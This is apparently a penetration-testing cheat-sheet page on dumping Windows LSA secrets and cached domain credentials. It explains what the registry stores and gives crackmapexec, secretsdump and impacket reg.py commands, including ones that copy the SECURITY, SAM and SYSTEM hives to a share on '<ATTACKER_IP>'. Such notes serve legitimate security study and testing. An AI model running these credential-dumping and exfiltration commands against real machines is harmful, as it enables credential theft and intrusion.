LSA Secrets

Administrator rights on the target machine are mandatory.

The registry is a place where identification information can be found. In the registry, the computer stores certain identification information necessary for the computer to function properly in a domain. One of the places where sensitive identification information is stored is in LSA secrets.

LSA secrets are special storage located in the registry that is used to save sensitive data that is only accessible to the local SYSTEM account.. LSA secrets are stored in an encrypted form within the registry at HKEY_LOCAL_MACHINE/Security/Policy/Secrets. The parent keys to decrypt the secrets are also stored within the registry at HKEY_LOCAL_MACHINE/Security/Policy.

In LSA Secrets you can find :

  • Domain machine account. In order to operate in a domain, a computer needs a machine account in the domain. The username and password for this machine account must therefore be available to the operating system and are therefore stored in the LSA secrets. It should also be noted that the password for this machine account is changed every 30 days by default. This machine account is used by the local SYSTEM account to interact with the domain, but not locally, so this account does not have administrative privileges on the machine.

  • Account passwords for Windows Services or scheduled tasks. In order to run services on behalf of a user, the computer must store the user's password. It is therefore possible to find unencrypted service account passwords in secret LSAs.

  • Password for auto-logon. If Windows auto-logon is enabled, the password can be stored in the secret LSAs. Alternatively, it can be stored in the registry key HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon under the key DefaulUserName. The domain and username are always registered in DefaultDomainName and DefaultUserName respectively.

  • DPAPI master keys. The Data Protection API (DPAPI) is used to allow users to encrypt sensitive data without having to worry about the cryptographic keys used. If you are able to recover the master keys, you can then decrypt certain user data.

  • Domain Cached Credentials. In addition, in the SECURITY hive file, the credentials of the last domain users to connect to the machine, called Domain Cached Credentials (DCC), are also stored. In this way, the computer can authenticate the domain user even if the connection to the domain controllers is lost. These cached credentials are MSCACHEV2/MSCASH hashes, which are different from NT hashes, and so cannot be used to perform a Pass-The-Hash. However, it is still possible for an attacker to try to crack them offline in order to recover the user's password.

By default, the caching policy allows 10 DCC2 credentials to be stored.

cme smb <TARGET> -u <USERNAME> -p <PASSWORD> --lsa

It is possible to use secretsdump to locally parse LSA secrets exported as a file (dump from the Security hive).

secretsdump.py -security '/path/to/security.save' LOCAL
secretsdump.py '<DOMAIN>/<USER>:<PASSWORD>@<TARGET>'

Reg:

Reg.py from impacket can also be used to remotely dump LSA:


reg.py "domain"/"user":"password"@"target" save -keyName 'HKLM\SECURITY' -o '\\<ATTACKER_IP>\someshare'

# backup all SAM, SYSTEM and SECURITY hives at once
reg.py "domain"/"user":"password"@"target" backup -o '\\<ATTACKER_IP>\someshare'

References:

Almost all the info comes from Hacker Recipes blog. You should definitely check it.

Last updated